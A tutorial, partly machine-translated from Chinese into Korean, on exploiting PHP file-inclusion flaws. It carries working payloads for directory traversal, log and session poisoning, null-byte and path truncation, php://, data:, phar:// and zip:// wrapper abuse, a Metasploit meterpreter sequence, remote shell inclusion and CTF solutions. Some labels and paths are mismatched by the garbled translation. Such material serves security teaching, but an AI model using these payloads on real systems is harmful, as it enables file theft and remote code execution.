> 헤드라인 > 취약점이 포함된 PHP 파일 형태 요약

취약점이 포함된 PHP 파일 형태 요약

풀어 주다: 2019-10-02 17:51:15
앞으로
9419명이 탐색했습니다.

Principle

파일 포함 취약점의 원인은 PHP 함수를 통해 파일이 도입될 때, 들어오는 파일 이름이 제대로 확인되지 않았기 때문에 예상치 못한 파일이 조작되어 예상치 못한 파일 유출 및 유출이 발생할 수 있기 때문입니다. 악성코드 삽입까지.

일반적으로 다음 네 가지 함수는 PHP에서 파일 포함 취약점을 유발합니다.

1.include() 이 함수를 사용하여 파일을 포함하는 경우 해당 코드가 include() 함수에 실행될 때만 파일이 포함됩니다. 오류가 발생하면 경고만 주고 계속 실행합니다.

2. include_once()의 기능은 include()와 동일합니다. 동일한 파일을 반복해서 호출하면 프로그램이 한 번만 호출한다는 점이 다릅니다.

3.require()는 프로그램이 실행되는 즉시 파일을 호출합니다. 오류가 발생하면 오류 메시지가 출력되고 스크립트가 종료됩니다.

4. require_once()는 require와 동일한 기능을 갖습니다. ()의 차이점은 동일한 파일을 반복적으로 호출할 때 프로그램은 해당 파일을 한 번만 호출한다는 것입니다.

이 네 가지 기능을 사용하여 새 파일을 포함하면 해당 파일은 PHP 코드로 실행되며 PHP 커널은 어떤 유형의 파일이 포함되는지 상관하지 않습니다. 따라서 포함된 txt 파일, 이미지 파일, 원격 URL 등이 포함되어 있으면 PHP 코드로도 실행됩니다. 이 기능은 공격을 수행할 때 매우 유용합니다.

조건을 사용하세요

(1) include 및 기타 함수를 사용하여 변수의 동적 실행을 통해 포함해야 하는 파일을 소개합니다.

(2) 사용자가 동적 변수를 제어할 수 있습니다.

분류

파일 포함 취약점은 RFI(원격 파일 포함)와 LFI(로컬 파일 포함)의 두 가지 유형으로 나눌 수 있습니다. 이를 구별하는 가장 쉬운 방법은 php.ini에서 허용_url_include가 켜져 있는지 여부입니다. 켜져 있으면 원격 파일이 포함될 수 있습니다.

1. 로컬 파일에는 LFI(로컬 파일 포함)가 포함됩니다

2. 원격 파일에는 RFI(원격 파일 포함)가 포함되어 있습니다(php.ini에서 허용_url_include=on 필요, 허용_url_fopen = On)

php.ini에서,allow_url_fopen은 default php5.2부터 항상 On으로 되어 있으며,allow_url_include는 기본적으로 Off로 되어 있습니다.

1. 로컬 포함

동일한 디렉터리에 있는 파일을 포함합니다.

?file=test.txt
로그인 후 복사

디렉터리 순회:

?file=./../../test.txt
로그인 후 복사

./ 현재 디렉터리 ../ 이전 디렉터리, 이렇게 디렉터리를 순회하여 파일을 읽습니다.

그림 트로이 목마 포함

명령줄에서 실행:

copy x.jpg /b + s.php /b f.jpg
로그인 후 복사

f.jpg 업로드, f.jpg 경로 찾기, f.jpg 포함

로그 포함

사용 조건: 알아야 함 서버 로그 경로 저장 및 로그 파일을 읽을 수 있습니다.

Apache와 같은 웹 서버는 로그 파일에 요청을 쓰는 경우가 많습니다. 사용자가 요청을 시작하면 요청이 access.log에 기록되고, 오류가 발생하면 해당 오류가 error.log에 기록됩니다. 기본적으로 로그 저장 경로는 /var/log/apache2/입니다.

?file=../../../../../../../../../var/log/apache/error.log
로그인 후 복사

1. 다음 요청을 제출하여 로그에 페이로드를 삽입하세요

취약점이 포함된 PHP 파일 형태 요약

2. UA를 사용하여 로그 파일에 페이로드를 삽입해 보세요

취약점이 포함된 PHP 파일 형태 요약

3.

기본 로그 경로

apache +Linux 로그 기본 경로

use exploit/unix/webapp/php_include
set rhost 192.168.159.128
set rport 80
set phpuri /index.php?file=xxLFIxx
set path http://172.18.176.147/
set payload php/meterpreter/bind_tcp
set srvport 8888
exploit -z
로그인 후 복사

or

/etc/httpd/logs/access_log
로그인 후 복사

apache+win2003 로그 기본 경로

/var/log/httpd/access log
로그인 후 복사

IIS6.0+win2003 기본 로그 파일

D:/xampp/apache/logs/access.log
D:/xampp/apache/logs/error.log
로그인 후 복사

IIS7.0+win2003 기본 로그 파일

C:/WINDOWS/system32/Logfiles
로그인 후 복사

사용자 설치 디렉터리의 nginx 로그 파일 로그 디렉터리 아래

설치 디렉터리가 /usr/local/nginx인 경우 로그 디렉터리는

%SystemDrive%/inetpub/logs/LogFiles
로그인 후 복사

에 있습니다. 구성 파일 Nginx를 통해 로그 경로를 가져올 수도 있습니다. conf

/usr/local/nginx/logs
로그인 후 복사

웹 미들웨어 기본 구성

apache+linux 기본 구성 파일

/opt/nginx/logs/access.log
로그인 후 복사

또는

/etc/httpd/conf/httpd.conf
로그인 후 복사

IIS6.0+win2003 구성 파일

index.php?page=/etc/init.d/httpd
로그인 후 복사

IIS7.0+WIN 구성 파일

C:/Windows/system32/inetsrv/metabase.xml
로그인 후 복사

세션 포함

사용 조건: 세션 파일 경로를 알고 있으며 일부 내용을 제어할 수 있습니다.

기본적으로 PHP에서 생성된 세션 파일은 /tmp 디렉터리에 저장되는 경우가 많습니다.

C:/Windows/System32/inetsrv/config/application/Host.config
로그인 후 복사
/tmp/sess_SESSIONID
로그인 후 복사

세션 파일은 일반적으로 /tmp 디렉터리에 sess_[phpsessid 값] 형식으로 있으며 때로는 /에 있을 수도 있습니다. var/lib/php5 등의 경우 이 작업을 수행하기 전에 구성 파일을 읽는 것이 좋습니다. 어떤 특별한 경우에는 세션 값을 제어할 수 있다면 /proc/self/environ 파일

을 포함하는 쉘

을 얻을 수 있습니다. 사용 조건:

1. PHP는 cgi에서 실행됩니다. 모드이므로 Environ 그런 다음에만 UA 헤드가 유지됩니다.

2. Environ 파일 저장 위치를 ​​알고 있으며 Environ 파일을 읽을 수 있습니다.

위치:

user-agent 헤더는 proc/self/environ에 저장됩니다. user-agent에 PHP 코드를 삽입하면 해당 PHP 코드가 Environ에 기록됩니다. 나중에 포함시키세요.

?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7
로그인 후 복사

User-Agent를 선택하고 다음과 같이 코드를 작성하세요.

?file=../../../../../../../proc/self/environ
로그인 후 복사

그런 다음 요청을 제출하세요.

임시 파일 포함

취약점이 포함된 PHP 파일 형태 요약

php 中上传文件,会创建临时文件。在 linux 下使用 /tmp 目录,而在 windows 下使用 c:\winsdows\temp 目录。在临时文件被删除之前,利用竞争即可包含该临时文件。

由于包含需要知道包含的文件名。一种方法是进行暴力猜解,linux 下使用的随机函数有缺陷,而 window 下只有 65535 中不同的文件名,所以这个方法是可行的。另一种方法 phpinfo 来获取临时文件的路径以及名称,然后临时文件在极短时间被删除的时候,需要竞争时间包含临时文件拿到 webshell。

有防御的本地文件包含

审计中可见这样的包含模版文件:

<?php
    $file = $_GET[&#39;file&#39;];
    include &#39;/var/www/html/&#39;.$file.&#39;/test/test.php&#39;;
?>
로그인 후 복사

这段代码指定了前缀和后缀:这样就很“难”直接去包含前面提到的种种文件。

1、%00 截断

能利用 00 截断的场景现在应该很少了

PHP 内核是由 C 语言实现的,因此使用了 C 语言中的一些字符串处理函数。在连接字符串时,0 字节 (\x00) 将作为字符串的结束符。所以在这个地方,攻击者只要在最后加入一个 0 字节,就能截断 file 变量之后的字符串。

?file=../../../../../../../../../etc/passwd%00
로그인 후 복사

需要 magic_quotes_gpc=off,PHP 小于 5.3.4 有效

2、%00 截断目录遍历:

?file=../../../../../../../../../var/www/%00
로그인 후 복사

需要 magic_quotes_gpc=off,unix 文件系统,比如 FreeBSD,OpenBSD,NetBSD,Solaris

3、路径长度截断:

?file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.
로그인 후 복사

php 版本小于 5.2.8 可以成功,linux 需要文件名长于 4096,windows 需要长于 256

利用操作系统对目录最大长度的限制,可以不需要 0 字节而达到截断的目的。

我们知道目录字符串,在 window 下 256 字节、linux 下 4096 字节时会达到最大值,最大值长度之后的字符将被丢弃。

而利用 "./" 的方式即可构造出超长目录字符串:

4、点号截断:

?file=../../../../../../../../../boot.ini/………[…]…………
로그인 후 복사

php 版本小于 5.2.8 可以成功,只适用 windows,点号需要长于 256

5、编码绕过

服务器端常常会对于 ../ 等做一些过滤,可以用一些编码来进行绕过。下面这些总结来自《白帽子讲 Web 安全》。

利用 url 编码:

../ -》 %2e%2e%2f -》 ..%2f -》 %2e%2e/
로그인 후 복사
..\ -》 %2e%2e%5c -》 ..%5c -》 %2e%2e\
로그인 후 복사

二次编码:

../ -》 %252e%252e%252f
로그인 후 복사
..\ -》 %252e%252e%255c
로그인 후 복사

二、远程文件包含

?file=[http|https|ftp]://www.bbb.com/shell.txt
로그인 후 복사

可以有三种,http、https、ftp

有防御的远程文件包含

 <?php 
    $basePath = $_GET[&#39;path&#39;];
    require_once $basePath . "/action/m_share.php";  
?>
로그인 후 복사

攻击者可以构造类似如下的攻击 URL

 path=http://localhost/test/solution.php? 
= 
path=http://localhost/test/solution.php%23
로그인 후 복사

产生的原理:

/?path=http://localhost/test/solution.php?
로그인 후 복사

最终目标应用程序代码实际上执行了:

require_once 
"http://localhost/test/solution.php?/action/m_share.php";
로그인 후 복사

注意,这里很巧妙,问号 "?" 后面的代码被解释成 URL 的 querystring,这也是一种"截断"思想,和 %00 一样

攻击者可以在 http://localhost/test/solution.php 上模拟出相应的路径,从而使之吻合

PHP 中的封装协议(伪协议)

http://cn2.php.net/manual/zh/wrappers.php
로그인 후 복사
file:///var/www/html 访问本地文件系统
ftp://<login>:<password>@<ftpserveraddress> 访问 FTP(s) URLs
data:// 数据流
http:// — 访问 HTTP(s) URLs
ftp:// — 访问 FTP(s) URLs
php:// — 访问各个输入/输出流
zlib:// — 压缩流
data:// — Data (RFC 2397)
glob:// — 查找匹配的文件路径模式
phar:// — PHP Archive
ssh2:// — Secure Shell 2
rar:// — RAR
ogg:// — Audio streams
expect:// — 处理交互式的流
로그인 후 복사

利用 php 流 input:

利用条件:

1、allow_url_include = On。

2、对 allow_url_fopen 不做要求。

index.php?file=php://input
POST:
<? phpinfo();?>
로그인 후 복사

취약점이 포함된 PHP 파일 형태 요약

结果将在 index.php 所在文件下的文件 shell.php 内增加 "" 一句话

利用 php 流 filter:

?file=php://filter/convert.base64-encode/resource=index.php
로그인 후 복사

通过指定末尾的文件,可以读取经 base64 加密后的文件源码,之后再 base64 解码一下就行。虽然不能直接获取到 shell 等,但能读取敏感文件危害也是挺大的。

其他姿势:

index.php?file=php://filter/convert.base64-encode/resource=index.php
로그인 후 복사

效果跟前面一样,少了 read 等关键字。在绕过一些 waf 时也许有用。

利用 data URIs:

利用条件:

1、php 版本大于等于 php5.2

2、allow_url_fopen = On

3、allow_url_include = On

利用 data:// 伪协议进行代码执行的思路原理和 php:// 是类似的,都是利用了 PHP 中的流的概念,将原本的 include 的文件流重定向到了用户可控制的输入流中

?file=data:text/plain,<?php phpinfo();?>
로그인 후 복사
?file=data:text/plain;base64,base64编码的payload
로그인 후 복사
index.php?file=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
로그인 후 복사

加号 + 的 url 编码为 %2b,PD9waHAgcGhwaW5mbygpOz8+ 的 base64 解码为:

需要 allow_url_include=On

利用 XSS 执行任意代码:

?file=http://127.0.0.1/path/xss.php?xss=phpcode
로그인 후 복사

利用条件:

1、allow_url_fopen = On

2、并且防火墙或者白名单不允许访问外网时,先在同站点找一个 XSS 漏洞,包含这个页面,就可以注入恶意代码了。条件非常极端和特殊

glob:// 伪协议

glob:// 查找匹配的文件路径模式

phar://

利用条件:

1、php 版本大于等于 php5.3.0

姿势:

假设有个文件 phpinfo.txt,其内容为 ,打包成 zip 压缩包,如下:

취약점이 포함된 PHP 파일 형태 요약

指定绝对路径

index.php?file=phar://D:/phpStudy/WWW/fileinclude/test.zip/phpinfo.txt
로그인 후 복사

或者使用相对路径(这里 test.zip 就在当前目录下)

index.php?file=phar://test.zip/phpinfo.txt
로그인 후 복사

zip://

利用条件:

1、php 版本大于等于 php5.3.0

<?php
$file = $_GET[&#39;file&#39;];
if(isset($file) && strtolower(substr($file, -4)) == ".jpg"){
    include($file);
}
?>
로그인 후 복사

截取过来的后面 4 格字符,判断是不是 jpg,如果是 jpg 才进行包含

但使用 zip 协议,需要指定绝对路径,同时将 # 编码为 %23,之后填上压缩包内的文件。

然后我们构造 zip://php.zip#php.jpg

index.php
?file=zip://D:\phpStudy\WWW\fileinclude\test.zip%23php.jpg
로그인 후 복사

注意事项:

1、若是使用相对路径,则会包含失败。

2、协议原型:zip://archive.zip#dir/file.txt

3、注意 url 编码,因为这个 # 会和 url 协议中的 # 冲突

CTF 中的文件包含套路

php 伪协议读取源码

点击 login,发现链接变为:

http://54.222.188.152:1/index.php?action=login.php
로그인 후 복사

推测文件包含 访问:

http://54.222.188.152:1/index.php?action=php://filter/read=convert.base64-encode/resource=login.php
로그인 후 복사

得到源码

贪婪包含

iscc2018 的一道题目,打开题目

취약점이 포함된 PHP 파일 형태 요약

查看源码

취약점이 포함된 PHP 파일 형태 요약

知道这里调用 show.php?img=1.jpg 访问,并修改 1 的值

취약점이 포함된 PHP 파일 형태 요약

大概可以猜测 文件包含漏洞,尝试

img=php://filter/read=convert.base64-encode/resource=show.php
로그인 후 복사

但是不行

题目的坑点在于还需要包含 jpg,这就是贪婪包含所在,也就是后台某处代码所致,

curl  
img=php://filter/resource=jpg/resource=show.php
로그인 후 복사
<?php
error_reporting(0);
ini_set(&#39;display_errors&#39;,&#39;Off&#39;);
include(&#39;config.php&#39;);
$img = $_GET[&#39;img&#39;];
if(isset($img) && !empty($img))
{
    if(strpos($img,&#39;jpg&#39;) !== false)
    {
        if(strpos($img,&#39;resource=&#39;) !== false && preg_match(&#39;/resource=.*jpg/i&#39;,$img) === 0)
        {
            die(&#39;File not found.&#39;);
        }
        preg_match(&#39;/^php:\/\/filter.*resource=([^|]*)/i&#39;,trim($img),$matches);
        if(isset($matches[1]))
        {
            $img = $matches[1];
        }
        header(&#39;Content-Type: image/jpeg&#39;);
        $data = get_contents($img);
        echo $data;
    }
    else
    {
        die(&#39;File not found.&#39;);
    }
}
else
{
    ?>
    <img  src="1.jpg" alt="취약점이 포함된 PHP 파일 형태 요약" >
    <?php
}
?>
로그인 후 복사

1、开头包含了 config.php

2、img 必须有 jpg 但又不能有 resource=.*jpg

3、正则检查了并把结果填充到 $matches 里去,说明我们可以使用 php://filter 伪协议,并且 resource 的值不含|,那么我们就可以用| 来分隔 php 和 jpg,因为正则匹配到| 就不会继续匹配后面的 jpg 了,使得 \$img=show.php

知道了 config.php 再去访问明白为什么必须包含 jpg

<?php
function get_contents($img)
{
        if(strpos($img,&#39;jpg&#39;) !== false)
        {
                return file_get_contents($img);
        }
        else
        {
                header(&#39;Content-Type: text/html&#39;);
                return file_get_contents($img);
        }
}
?>
로그인 후 복사

最终 payload:

 
img=php://filter/resource=../flag.php|jpg
로그인 후 복사

%00 截断

要求:

1、php 版本小于 5.3.4

2、magic_quotes_gpc 为 off 状态

大多数的文件包含漏洞都是需要截断的,因为正常程序里面包含的文件代码一般是 include(BASEPATH.$mod.’.php’) 或者 include($mod.’.php’) 这样的方式,如果我们不能写入 .php 为扩展名的文件,那我们是需要截断来利用的受限与 gpc 和 addslashes 等函数的过滤,另外,php5.3 之后的版本全面修复了 %00 截断的问题

<?php
include($_GET[&#39;a&#39;].&#39;.php&#39;)
?>
로그인 후 복사

上传我们的 2.txt 文件,请求

http://localhost/test/1.php?a=2.txt%00
로그인 후 복사

即可执行 2.txt 中 phpinfo 的代码

列子二

漏洞文件 index.php

 
<?php
if (empty($_GET["file"])){
    echo(&#39;../flag.php&#39;);
    return;
}
else{
    $filename=&#39;pages/&#39;.(isset($_GET["file"])?$_GET["file"]:"welcome.txt").&#39;.html&#39;;
    include $filename;
}
?>
로그인 후 복사

flag 文件放在上层目录

这里限制了后缀名,我们需要通过截断才能访问到 flag 文件 利用代码:

index.php?file=../../flag.php%00
로그인 후 복사

%00 会被解析为 0x00,所以导致截断的发生 我们通过截断成功的绕过了后缀限制

路径长度截断

我们现在已经知道使用 %00 截断有两个条件 php 版本小于 5.3.4 和 magic_quotes_gpc 为 off 状态。 如果这时我们将 magic_quotes_gpc 改为 on 那么就不能截断了,因为开启 magic_quotes_gpc 后 %00 会被加上一个反斜杠转义掉

취약점이 포함된 PHP 파일 형태 요약

那么我们这时候有没有办法绕过这个限制呢?有一个条件那就是 php 版本小于 5.3.10 我们的代码依旧不变 漏洞文件 index.php

<?php
if (empty($_GET["file"])){
    echo(&#39;../flag.php&#39;);
    return;
}
else{
    $filename=&#39;pages/&#39;.(isset($_GET["file"])?$_GET["file"]:"welcome.txt").&#39;.html&#39;;
    include $filename;
}
?>
로그인 후 복사

flag 文件放在上层目录 这时我们可以使用字符 ./. 和 ./ 来进行绕过,因为文件路径有长度限制

windows 259 个 bytes
로그인 후 복사
linux 4096 个 bytes
로그인 후 복사

在 windows 下需要.字符最少的利用 POC1:

file=../../flag.php...................................................................
......................................................................................
.....................................................................................
로그인 후 복사

취약점이 포함된 PHP 파일 형태 요약

在 windows 下需要.字符最少的利用 POC2:

file=../../flag.php./././././././././././././././././././././././././././././././././././././
././././././././././././././././././././././././././././././././././././././././././././././.
/./././././././././././././././././././././././././././././././././././
로그인 후 복사

취약점이 포함된 PHP 파일 형태 요약

将 flag.php 改为 flag1.php 在 windows 下需要.字符最少的利用 POC3:

file=../../flag1.php/./././././././././././././././././././././././././././././././././././
./././././././././././././././././././././././././././././././././././././././././././././.
/././././././././././././././././././././././././././././././././././././
로그인 후 복사

취약점이 포함된 PHP 파일 형태 요약

我们发现在使用 payload3 时将文件名改为了 flag1.php,而 payload2 和 payload3 则是一个.开始,一个 / 开始。 

这和文件长度的奇偶性有关,当为偶数的时候我们选择 payload2,为奇数的时候我们选择 payload3

관련 라벨:
php
원천:微信公众号 合天智汇
본 웹사이트의 성명
본 글의 내용은 네티즌들의 자발적인 기여로 작성되었으며, 저작권은 원저작자에게 있습니다. 본 사이트는 이에 상응하는 법적 책임을 지지 않습니다. 표절이나 침해가 의심되는 콘텐츠를 발견한 경우 admin@php.cn으로 문의하세요.
인기 튜토리얼
더>
최신 다운로드
더>
웹 효과
웹사이트 소스 코드
웹사이트 자료
프론트엔드 템플릿